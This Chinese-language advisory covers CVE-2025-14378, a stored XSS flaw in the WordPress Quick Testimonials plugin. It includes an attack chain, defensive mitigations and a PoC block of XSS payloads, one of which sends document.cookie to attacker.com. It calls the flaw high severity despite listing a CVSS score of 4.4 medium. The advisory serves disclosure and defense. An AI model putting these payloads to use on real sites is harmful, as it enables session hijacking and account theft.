CVE-2025-14378 WordPress Quick Testimonials插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14378

漏洞类型

存储型XSS

CVSS评分

4.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WordPress Quick Testimonials插件

漏洞概述

CVE-2025-14378是WordPress Quick Testimonials插件中的一个高危存储型跨站脚本（Stored XSS）漏洞。该插件专为WordPress网站设计，用于管理和展示用户评价。漏洞存在于所有版本直到2.1，由于插件在处理用户输入时缺乏充分的输入清理（input sanitization）和输出转义（output escaping）机制，导致恶意JavaScript代码可以被永久存储在数据库中。攻击者利用此漏洞需要具备管理员级别或更高权限，成功注入后，恶意脚本会在用户访问包含注入内容的页面时自动执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。该漏洞的影响范围受到一定限制，仅影响多站点（multi-site）WordPress安装或已禁用unfiltered_html功能的站点。

技术细节

漏洞根源在于Quick Testimonials插件的管理设置页面未对用户输入进行充分的输入验证和清理。当管理员在插件设置中提交包含恶意脚本的内容时，这些内容被直接存储到数据库而未经过滤。在后续页面渲染过程中，这些未转义的内容被直接输出到HTML中，浏览器将其解析为可执行脚本。具体来说，插件在处理testimonial内容的各个环节缺少适当的HTML实体编码（如将<转换为<，>转换为>等），使得攻击者可以嵌入<script>标签或事件处理器（如onerror、onload等）属性。攻击者需要通过WordPress管理员后台访问插件设置页面，提交精心构造的恶意payload。由于WordPress默认情况下会过滤管理员的HTML输入，但在多站点环境或unfiltered_html被禁用的情况下，这些过滤机制可能被绕过，导致存储型XSS漏洞被触发。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标网站使用的WordPress版本，确认安装了Quick Testimonials插件且版本≤2.1

STEP 2

权限获取

攻击者通过社会工程、密码喷洒或其他方式获取目标WordPress站点的管理员账户凭据

STEP 3

漏洞利用

使用管理员账户登录后台，导航到Quick Testimonials插件设置页面，在评价内容字段中注入恶意XSS payload

STEP 4

持久化

提交设置后，恶意脚本被存储在数据库中，由于插件缺乏输出转义，数据以可执行状态保存

STEP 5

触发执行

当其他用户（管理员、编辑或访客）访问包含该评价内容的页面时，恶意脚本在用户浏览器中自动执行

STEP 6

恶意行为

XSS payload执行后可窃取用户会话cookie、劫持账户、进行钓鱼攻击或传播恶意内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-14378 PoC: Stored XSS in Quick Testimonials WordPress Plugin -->
<!-- Attack requires admin-level privileges -->

<!-- Method 1: Using script tag -->
<script>alert(document.cookie)</script>

<!-- Method 2: Using event handler on an img tag -->
<img src=x onerror=this.src='https://attacker.com/log?c='+document.cookie>

<!-- Method 3: Using inline event handler -->
<div onmouseover='eval(atob("YWxlcnQoJ1hTUyBBdHRhY2tlZCcpOw=="))'>test</div>

<!-- PoC Explanation -->
<!-- Step 1: Login as administrator -->
<!-- Step 2: Navigate to Quick Testimonials plugin settings -->
<!-- Step 3: Insert any of the above payloads in testimonial fields -->
<!-- Step 4: Save settings -->
<!-- Step 5: When any user views the page containing the testimonial, the XSS will execute -->

影响范围

WordPress Quick Testimonials插件 <= 2.1

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）立即审查并删除可疑的管理员账户，确保所有管理员账户使用强密码；2）限制管理员权限的账户数量；3）在Web服务器层面配置Content-Security-Policy响应头，限制脚本执行；4）考虑暂时禁用Quick Testimonials插件直到漏洞修复；5）启用WordPress的安全日志监控，密切关注管理员后台的异常操作行为。